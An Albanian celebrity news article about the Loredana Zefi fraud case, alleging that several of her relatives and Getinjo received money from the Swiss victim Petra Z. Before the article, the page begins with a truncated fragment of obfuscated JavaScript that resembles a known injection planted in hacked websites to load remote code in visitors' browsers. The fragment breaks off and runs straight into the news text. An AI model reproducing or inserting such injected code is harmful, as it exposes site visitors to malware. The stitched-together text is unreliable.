;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Afera LOREDANA: Përfshihet edhe Getinjo dhe anëtarë të tjerë të familjes

By

Në rastin Loredana, edhe anëtarët e tjerë të familjes janë të përfshirë.

Njëri prej vëllezërve të reperes që konsiderohej si “Eskobari i Emmenbrucke” dhe vëllai i Mozzik-ut, Getinjo.

Petra Z., viktima e rastit Loredana, jo vetëm që i transferoi para reperes. Por sipas 20min.ch, paratë rrodhën edhe tek anëtarët e shumtë të familjes.

Vëllai i saj me emrin Berat, duke u paraqitur si “Antonio Cas”, mori nga Petra Z. 200 mijë franga të gatshme ndërkaq nëna e Loredanës mori rreth 3500 franga zvicerane.

Vëllai i Mozzik-ut, i cili gjithashtu është një artist i suksesshëm kosovar që ka arritur të jetë në krye të listave shqiptare gjatë vitit 2016, mori 12 mijë franga nga Petra Z, më 13.12.2017. Kjo është dëshmuar me urdhërpagesa, të cilat i ka në dispozicion 20min.ch.

Petra Z. ishte mashtruar duke menduar se shumat e transferuara do të përdoreshin për të marrë paratë e saj nga kredia e saj.

Përveç kësaj, më 2 gusht 2018, një i afërm i Loredanës, përdori kartën e kreditit të Hans Z., burrit të Petra Z., për të porositur kozmetikë me vlerë 60 dollarë në internet.

Vëllai tjetër i reperes, Agoni, e mbajti Petra Z, për disa muaj duke i premtuar me dhjetëra mesazhe se ajo do t’i merrte paratë e saj.

Petra Z ka transferuar para edhe për vëllanë tjetër të Loredanës me emrin Faton.

Pse Petra Z. ia transferoi paratë këtyre personave të panjohur?

“Loredana më kërcënoi”, shpjegon viktima.

Ajo tha se nëse nuk paguaj, nuk do t’i shoh kurrë më paratë e mia, shpjegoi më tej Petra Z.

Pasi u arrestua Loredana Zefi, Fatoni, vëllai i saj, e thirri Petra Z. nga Kosova, të martën e kaluar.

“Ai më tha se ishte faji im që policia ka marrë një grua që ka fëmijë të vogël dhe ka bastisur shtëpinë e saj”, thotë Petra Z.

Siç tregojnë hulumtime të 20min.ch, Fatoni u dëbua nga Zvicra. Në maj të vitit 2016, Gjykata e Luzernit, hodhi poshtë ankesën e tij, pasi Fatoni ishte i ndjekur penalisht. Që nga viti 1999, ai është dënuar jo më pak se 73 herë për vjedhje.

Fatoni u konsiderua si Eskobar (një tregtar droge). Gjykata në Luzern e dënoi atë në mars të vitit 2015 me 18 muaj burg.

Duhet të theksohet se anëtarët e përmendur të familjes nuk janë të akuzuar ose të përfshirë në procedurën penale kundër Loredanës.

Loredana Zefi, javën e kaluar mbajti një konferencë për media në hotelin Emerald, duke pranuar se paratë nga çifti zviceran janë marrë, por jo me dhunë, kërcënime apo mashtrime, siç po akuzohet.

Ajo vazhdoi të qëndronte në Kosovë për të përfunduar xhirimet e videoklipit të saj dhe pasi i mbaroi u nis drejt shtëpisë së saj në Zvicër./Prive.al

Artikuj të ngjashëm